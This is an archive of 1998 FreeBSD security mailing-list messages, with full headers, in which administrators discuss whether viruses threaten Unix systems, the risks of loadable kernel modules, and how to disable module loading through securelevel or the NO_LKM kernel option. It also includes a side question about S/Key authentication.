``And when one of our comrades was taken prisoner, blindfolded, hung upside-down, shot, and burned, we thought to ourselves, `These are the best experiences of our lives'''
-Pathology (Joe Frank, Somewhere Out There)

From owner-freebsd-security Wed May 20 17:19:24 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA01655 for freebsd-security-outgoing; Wed, 20 May 1998 17:19:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA01618 for ; Wed, 20 May 1998 17:19:04 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id RAA04596; Wed, 20 May 1998 17:18:59 -0700 (PDT)
Message-Id: <199805210018.RAA04596@passer.osg.gov.bc.ca>
Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaaepaa; Wed May 20 17:18:58 1998
X-Mailer: exmh version 2.0gamma 1/27/96
Reply-to: Cy Schubert - ITSD Open Systems Group
X-Sender: cschuber
To: Emmanuel Gravel
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-reply-to: Your message of "Wed, 20 May 1998 13:17:11 PDT." <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 20 May 1998 17:18:37 -0700
From: Cy Schubert - ITSD Open Systems Group
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> Stunt Pope wrote:
> > On 20-May-98 Emmanuel Gravel wrote:
> > > I haven't heard of a virus made for a Unix-like OS before, but I'm
> > > wondering if this can be an issue with FreeBSD (or Linux for that
> > > matter). I'm saying this since they both run on the most common
> > > platform there is today, the PC. I know most virii were written for
> > > DOS-like OS's, but it's my impression that the common point between
> > > both machines is the hardware.
> > >
> > > Can anyone either clear this for me, or point me in the right direction
> > > for some info?
> > >
> >
> > Check out the Bugtraq archives and search on "linux virus"; there was
> > one released last summer or so, mainly as an exercise IIRC. Can't
> > remember the name of it though.
> >
> > (http://www.geek-girl.com/bugtraq/)
> >
> > -mark
>
> Thanks for all the info. Now for a second question. Since there is an
> antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two
> more Unix OS's) is there anything similar made for FreeBSD? What can
> one download/purchase to prevent:
>
> 1- Arrival/infection of the system from any virus that would target
> FreeBSD?
> 2- Presence of virii for any other OS in any file on the system?
>
> Thanks for your help!

Sorry for getting into this late... another day of meetings.

The Linux virus was not a virus in the truest sense. What it did was to move the original binary to some other directory and replace it with itself, which in turn would do what virus-like programs like to do and finally exec(2) the original program. If you want to characterize this in any way, it would probably be closer to a trojan horse than a virus, though that's more an issue of semantics.

The best way to detect such a beast on a UNIX system would probably be with tripwire or some other application that maintains signatures of various files on your system.

>
> Emmanuel Gravel
> egravel@elr346.ateng.az.honeywell.com

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Open Systems Group             Internet:  cschuber@uumail.gov.bc.ca
ITSD                                      Cy.Schubert@gems8.gov.bc.ca
Government of BC

From owner-freebsd-security Wed May 20 18:51:04 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA17677 for freebsd-security-outgoing; Wed, 20 May 1998 18:51:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from goliath.camtech.net.au (goliath.camtech.net.au [203.5.73.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA17551 for ; Wed, 20 May 1998 18:50:21 -0700 (PDT) (envelope-from newton@camtech.com.au)
Received: from sebastion.sa.camtech.com.au (sebastion.sa.camtech.com.au [203.28.3.2]) by goliath.camtech.net.au (8.8.5/8.8.2) with ESMTP id LAA05083; Thu, 21 May 1998 11:16:47 +0930 (CST)
Received: (from smtp@localhost) by sebastion.sa.camtech.com.au (8.8.5/8.8.7) id LAA02391; Thu, 21 May 1998 11:19:44 +0930 (CST)
Received: from slingshot(192.168.1.2) by sebastion via smap (V2.0) id xma002389; Thu, 21 May 98 11:19:32 +0930
Received: from frenzy.ct (newton@frenzy.ct [192.168.4.65]) by slingshot.camtech.com.au (8.6.12/8.6.12) with ESMTP id LAA11667; Thu, 21 May 1998 11:17:07 +0930
From: Mark Newton
Received: (from newton@localhost) by frenzy.ct (8.8.8/8.8.8) id LAA25157; Thu, 21 May 1998 11:19:29 +0930 (CST)
Message-Id: <199805210149.LAA25157@frenzy.ct>
Subject: Re: Virus on FreeBSD
In-Reply-To: <199805210018.RAA04596@passer.osg.gov.bc.ca> from Cy Schubert - ITSD Open Systems Group at "May 20, 98 05:18:37 pm"
To: cschuber@uumail.gov.bc.ca
Date: Thu, 21 May 1998 11:19:29 +0930 (CST)
Cc: egravel@elr346.ateng.az.honeywell.com, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Cy Schubert - ITSD Open Systems Group wrote:
> Stunt Pope wrote:
> > Thanks for all the info. Now for a second question. Since there is an
> > antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two
> > more Unix OS's) is there anything similar made for FreeBSD? What can
> > one download/purchase to prevent:
> >
> > 1- Arrival/infection of the system from any virus that would target
> > FreeBSD?
> > 2- Presence of virii for any other OS in any file on the system?

In addition to Cy's comments about the Linux "virus", I'd also point out that TTBOMK McAfee's virus scanners for Unix don't search for Unix viruses; they search for Wintel and Mac viruses enclosed within email attachments on Unix mail servers. As such they fit category 2 above.

Category 1 is so far off the radar that it isn't worth considering -- IF one shows a little bit of discipline with the use of one's hash prompt (i.e.: don't go running foreign binaries as root unless you trust 'em). Since most people seem to show that required discipline, I'd guess that the law of diminishing returns makes it unworthwhile to actually write Unix viruses in the first place.

LKMs open vast new vistas of potential for viruses, btw. I attended a series of seminars given by Kirk some number of years ago, where he said the decision to avoid expending development time on LKMs for 4.4BSD was partly motivated by the security concerns raised by the ability to move executable code from user-space (i.e.: the filesystem) into the kernel. Mitnick's SunOS "tap" streams module is but one example :-)

- mark

---
Mark Newton                               Email: newton@communica.com.au
Systems Engineer and Senior Trainer       Phone: +61-8-8303-3300
Communica Systems, a member of the        Fax:   +61-8-8303-4403
CAMTECH group of companies                WWW:   http://www.communica.com.au

From owner-freebsd-security Thu May 21 07:31:39 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA15728 for freebsd-security-outgoing; Thu, 21 May 1998 07:31:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA15710 for ; Thu, 21 May 1998 07:31:24 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com)
Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id KAA29470 for ; Thu, 21 May 1998 10:31:07 -0400 (EDT)
Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id KAA02527 for ; Thu, 21 May 1998 10:31:09 -0400 (EDT)
Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id KAA17444; Thu, 21 May 1998 10:31:08 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com)
Date: Thu, 21 May 1998 10:31:08 -0400 (EDT)
Message-Id: <199805211431.KAA17444@brain.zeus.leitch.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
From: woods@zeus.leitch.com (Greg A. Woods)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: Mark Newton's message of "Thu, May 21, 1998 11:19:29 +0930" regarding "Re: Virus on FreeBSD" id <199805210149.LAA25157@frenzy.ct>
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct>
X-Mailer: VM 6.45 under Emacs 20.2.1
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

[ On Thu, May 21, 1998 at 11:19:29 (+0930), Mark Newton wrote: ]
> Subject: Re: Virus on FreeBSD
>
> LKMs open vast new vistas of potential for viruses, btw. I attended a
> series of seminars given by Kirk some number of years ago, where he
> said the decision to avoid expending development time on LKMs for 4.4BSD
> was partly motivated by the security concerns raised by the ability to
> move executable code from user-space (i.e.: the filesystem) into the
> kernel. Mitnick's SunOS "tap" streams module is but one example :-)

A "published" LKM that can do the most nasty things was in the Phrack newsletter issue #51.

Anyone who's read that article and has even the tiniest amount of imagination would *NEVER* run LKMs on a production machine. Sure they're a great tool for doing OS development and experimentation at the lowest levels, but they're more dangerous in a production environment than not even having a root password in the first place (at least with the latter you *know* your security is blown).

(And that's just one reason never to run SunOS-5 in production! ;-)

I'd love to have a "virus" scanner that could detect the signature of a LKM module or the LKM loader in a kernel. Of course by "signature" here I mean something that would recognize the style of code necessary to perform this operation, not the specific sequence of bits in any given implementation.

--
Greg A. Woods
+1 416 443-1734      VE3TCP
Planix, Inc. ; Secrets of the Weird

From owner-freebsd-security Thu May 21 08:17:07 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA22167 for freebsd-security-outgoing; Thu, 21 May 1998 08:17:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from unix1.it-datacntr.louisville.edu (unix1.it-datacntr.louisville.edu [136.165.4.27]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA22155 for ; Thu, 21 May 1998 08:16:58 -0700 (PDT) (envelope-from k.stevenson@louisville.edu)
Received: from homer.louisville.edu (ktstev01@homer.it-datacntr.louisville.edu [136.165.1.20]) by unix1.it-datacntr.louisville.edu (8.8.7/8.8.7) with ESMTP id LAA42586 for ; Thu, 21 May 1998 11:16:54 -0400
Received: (from ktstev01@localhost) by homer.louisville.edu (8.8.8/8.8.8) id LAA12188; Thu, 21 May 1998 11:16:53 -0400 (EDT)
Message-ID: <19980521111653.A9283@homer.louisville.edu>
Date: Thu, 21 May 1998 11:16:53 -0400
From: Keith Stevenson
To: freebsd-security@FreeBSD.ORG
Subject: LKMs (Was: Virus on FreeBSD)
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.91.1i
In-Reply-To: <199805211431.KAA17444@brain.zeus.leitch.com>; from Greg A. Woods on Thu, May 21, 1998 at 10:31:08AM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint. How does one go about removing that functionality from the system?

Thanks,
--Keith Stevenson--

--
Keith Stevenson
System Programmer - Data Center Services - University of Louisville
k.stevenson@louisville.edu
PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0

On Thu, May 21, 1998 at 10:31:08AM -0400, Greg A. Woods wrote:
>
> A "published" LKM that can do the most nasty things was in the Phrack
> newsletter issue #51.
>
> Anyone who's read that article and has even the tiniest amount of
> imagination would *NEVER* run LKMs on a production machine. Sure
> they're a great tool for doing OS development and experimentation at the
> lowest levels, but they're more dangerous in a production environment
> than not even having a root password in the first place (at least with
> the latter you *know* your security is blown).
>

From owner-freebsd-security Thu May 21 09:17:03 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA01856 for freebsd-security-outgoing; Thu, 21 May 1998 09:17:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA01846 for ; Thu, 21 May 1998 09:16:58 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id UAA15419 for ; Thu, 21 May 1998 20:17:29 +0200
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id SAA21144 for ; Thu, 21 May 1998 18:41:36 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id SAA05380; Thu, 21 May 1998 18:15:56 +0200 (CEST)
Message-ID: <19980521181555.59333@deepo.prosa.dk>
Date: Thu, 21 May 1998 18:15:55 +0200
From: Philippe Regnauld
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.88e
In-Reply-To: <199805211431.KAA17444@brain.zeus.leitch.com>; from Greg A. Woods on Thu, May 21, 1998 at 10:31:08AM -0400
X-Operating-System: FreeBSD 2.2.5-STABLE i386
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Greg A. Woods writes:

> Anyone who's read that article and has even the tiniest amount of
> imagination would *NEVER* run LKMs on a production machine. Sure

BTW, is there a mechanism to disable loading of LKMs? (Of course, removing the modload command is one way.) I was thinking about something that looked at the securelevel and refused to load/unload a module depending on it.

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
«Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle

From owner-freebsd-security Thu May 21 09:32:50 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA05044 for freebsd-security-outgoing; Thu, 21 May 1998 09:32:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA05033 for ; Thu, 21 May 1998 09:32:43 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id UAA15429 for ; Thu, 21 May 1998 20:33:21 +0200
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id SAA21158 for ; Thu, 21 May 1998 18:57:29 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id SAA05477; Thu, 21 May 1998 18:31:48 +0200 (CEST)
Message-ID: <19980521183148.07894@deepo.prosa.dk>
Date: Thu, 21 May 1998 18:31:48 +0200
From: Philippe Regnauld
To: freebsd-security@FreeBSD.ORG
Subject: SKey and locked account
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.88e
X-Operating-System: FreeBSD 2.2.5-STABLE i386
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

I'm currently experimenting with 2.2.6, FWTK and skey.

1) First thing I noticed is that it's possible for someone to log into the system, even if the account is disabled ('*' in the passwd field), when S/Key is enabled for that user. Surprise to me.

2) Also, I've tried to use the FWTK's authmgr to set Skey user auth. I use the authmgr's command "proto " to set the user's auth type:

    authmgr-> proto bob skey
    changed

then I initialize the password with the seed:

    authmgr-> pass bob gw68016
    /usr/libexec/ld.so: Undefined symbol "_MD4Init" called from authsrv:/usr/lib/libskey.so.2.0 at 0x2002a218
                                          ^^^^

Am I missing something here?

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
«Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle

From owner-freebsd-security Thu May 21 09:39:06 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA06320 for freebsd-security-outgoing; Thu, 21 May 1998 09:39:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ELR17.ateng.az.honeywell.com (elr17.ateng.az.Honeywell.COM [129.239.169.43]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA06302 for ; Thu, 21 May 1998 09:38:55 -0700 (PDT) (envelope-from egravel@elr346.ateng.az.honeywell.com)
Received: from elr346.ateng.az.honeywell.com by elr346.ateng.az.honeywell.com with SMTP; Thu, 21 May 1998 9:38:02 -0700
Message-ID: <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com>
Date: Thu, 21 May 1998 09:38:00 -0700
From: Emmanuel Gravel
Organization: Honeywell
X-Mailer: Mozilla 3.03Gold (X11; I; OpenVMS V6.1 VAXstation 4000-90)
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> A "published" LKM that can do the most nasty things was in the Phrack
> newsletter issue #51.

Thanks for the info. I'm trying to get the info from Phrack #51 on 2600.com but nothing seems to point to LKMs yet. Do you have any info on which article it could be in? If it's in that one at all?

cu l8r!

Emmanuel Gravel
egravel@elr346.ateng.az.honeywell.com

From owner-freebsd-security Thu May 21 10:08:20 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA12787 for freebsd-security-outgoing; Thu, 21 May 1998 10:08:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fledge.watson.org (root@COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA12773 for ; Thu, 21 May 1998 10:08:13 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id NAA29520; Thu, 21 May 1998 13:07:59 -0400 (EDT)
Date: Thu, 21 May 1998 13:07:58 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Philippe Regnauld
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: <19980521181555.59333@deepo.prosa.dk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id KAA12777
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

From a quick examination of kern/kern_lkm.c, it appears that if the securelevel > 0, changes to LKMs are not allowed (load, unload, etc).

On Thu, 21 May 1998, Philippe Regnauld wrote:

> Greg A. Woods writes:
>
> > Anyone who's read that article and has even the tiniest amount of
> > imagination would *NEVER* run LKMs on a production machine. Sure
>
> BTW, is there a mechanism to disable loading of LKMs?
> (Of course, removing the modload command is one way.) I was
> thinking about something that looked at the securelevel
> and refused to load/unload a module depending on it.
>
> --
> -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
> «Pluto placed his bad dog at the entrance of Hades to keep the dead
> IN and the living OUT! The archetypical corporate firewall?»
> - S. Kelly Bootle
>

  Robert N Watson
----
Carnegie Mellon University            http://www.cmu.edu/
Trusted Information Systems           http://www.tis.com/
SafePort Network Services             http://www.safeport.com/
robert@fledge.watson.org              http://www.watson.org/~robert/

From owner-freebsd-security Thu May 21 10:28:16 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17357 for freebsd-security-outgoing; Thu, 21 May 1998 10:28:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17341 for ; Thu, 21 May 1998 10:28:11 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.8/8.8.8) id NAA29451; Thu, 21 May 1998 13:28:05 -0400 (EDT) (envelope-from wollman)
Date: Thu, 21 May 1998 13:28:05 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199805211728.NAA29451@khavrinen.lcs.mit.edu>
To: Keith Stevenson
Cc: freebsd-security@FreeBSD.ORG
Subject: LKMs (Was: Virus on FreeBSD)
In-Reply-To: <19980521111653.A9283@homer.louisville.edu>
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <19980521111653.A9283@homer.louisville.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

< said:

> Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint.
> How does one go about removing that functionality from the system?

In the case of FreeBSD, set the security level to 2. The functionality isn't removed -- we don't provide for that -- but it is inaccessible.

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                 - Susan Aglukark and Chad Irschick

From owner-freebsd-security Thu May 21 11:30:13 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA28349 for freebsd-security-outgoing; Thu, 21 May 1998 11:30:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA28228 for ; Thu, 21 May 1998 11:29:48 -0700 (PDT) (envelope-from dima@burka.rdy.com)
Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id LAA07981; Thu, 21 May 1998 11:29:37 -0700 (PDT)
Message-Id: <199805211829.LAA07981@burka.rdy.com>
Subject: Re: LKMs (Was: Virus on FreeBSD)
In-Reply-To: <19980521111653.A9283@homer.louisville.edu> from Keith Stevenson at "May 21, 98 11:16:53 am"
To: k.stevenson@louisville.edu (Keith Stevenson)
Date: Thu, 21 May 1998 11:29:37 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG
X-Class: Fast
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Keith Stevenson writes:
> Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint.
> How does one go about removing that functionality from the system?

Add:

	options NO_LKM

to your kernel config file.

>
> Thanks,
> --Keith Stevenson--
>
> --
> Keith Stevenson
> System Programmer - Data Center Services - University of Louisville
> k.stevenson@louisville.edu
> PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0
>
> On Thu, May 21, 1998 at 10:31:08AM -0400, Greg A. Woods wrote:
> >
> > A "published" LKM that can do the most nasty things was in the Phrack
> > newsletter issue #51.
> >
> > Anyone who's read that article and has even the tiniest amount of
> > imagination would *NEVER* run LKMs on a production machine. Sure
> > they're a great tool for doing OS development and experimentation at the
> > lowest levels, but they're more dangerous in a production environment
> > than not even having a root password in the first place (at least with
> > the latter you *know* your security is blown).
> >
>

-- dima

From owner-freebsd-security Thu May 21 11:40:23 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA00830 for freebsd-security-outgoing; Thu, 21 May 1998 11:40:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA00675 for ; Thu, 21 May 1998 11:39:56 -0700 (PDT) (envelope-from dima@burka.rdy.com)
Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id LAA08124; Thu, 21 May 1998 11:39:37 -0700 (PDT)
Message-Id: <199805211839.LAA08124@burka.rdy.com>
Subject: Re: Virus on FreeBSD
In-Reply-To: <19980521181555.59333@deepo.prosa.dk> from Philippe Regnauld at "May 21, 98 06:15:55 pm"
To: regnauld@deepo.prosa.dk (Philippe Regnauld)
Date: Thu, 21 May 1998 11:39:37 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG
X-Class: Fast
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Philippe Regnauld writes:
> Greg A. Woods writes:
>
> > Anyone who's read that article and has even the tiniest amount of
> > imagination would *NEVER* run LKMs on a production machine. Sure
>
> BTW, is there a mechanism to disable loading of LKMs?
> (Of course, removing the modload command is one way.) I was
> thinking about something that looked at the securelevel
> and refused to load/unload a module depending on it.

You can't load LKMs if your secure level > 0. Just to make sure, you can define NO_LKM in your kernel config file :-)

>
> --
> -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
> «Pluto placed his bad dog at the entrance of Hades to keep the dead
> IN and the living OUT! The archetypical corporate firewall?»
> - S. Kelly Bootle
>

-- dima

From owner-freebsd-security Thu May 21 12:02:56 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA04764 for freebsd-security-outgoing; Thu, 21 May 1998 12:02:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA04463 for ; Thu, 21 May 1998 12:01:40 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com)
Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id PAA01303; Thu, 21 May 1998 15:01:21 -0400 (EDT)
Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id PAA03747; Thu, 21 May 1998 15:01:23 -0400 (EDT)
Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id PAA23176; Thu, 21 May 1998 15:01:23 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com)
Date: Thu, 21 May 1998 15:01:23 -0400 (EDT)
Message-Id: <199805211901.PAA23176@brain.zeus.leitch.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
From: woods@zeus.leitch.com (Greg A. Woods)
To: Philippe Regnauld
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: Philippe Regnauld's message of "Thu, May 21, 1998 18:15:55 +0200" regarding "Re: Virus on FreeBSD" id <19980521181555.59333@deepo.prosa.dk>
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <19980521181555.59333@deepo.prosa.dk>
X-Mailer: VM 6.45 under Emacs 20.2.1
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

[ On Thu, May 21, 1998 at 18:15:55 (+0200), Philippe Regnauld wrote: ]
> Subject: Re: Virus on FreeBSD
>
> Greg A. Woods writes:
> 
> > Anyone who's read that article and has even the tiniest amount of
> > imagination would *NEVER* run LKMs on a production machine.  Sure
> 
>     BTW, is there a mechanism to disable loading of LKMs ?
>     (of course, removing the modload command is one way) -- I was
>     thinking about something that looked at the securelevel
>     and refused to load/unload a module depending on it.

Not difficult at all, thankfully.  Just define NO_LKM in your kernel
configuration (from the /sys/i386/conf/LINT kernel config example):

    # If you want to disable loadable kernel modules (LKM), you
    # might want to use this option.
    options NO_LKM

I've not done a code walkthrough to ensure this is 100%, but it's a good
start and at least prevents modload from being useful.

-- 
Greg A. Woods
+1 416 443-1734 VE3TCP
Planix, Inc. ; Secrets of the Weird

From owner-freebsd-security Thu May 21 12:21:10 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07498 for freebsd-security-outgoing; Thu, 21 May 1998 12:21:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
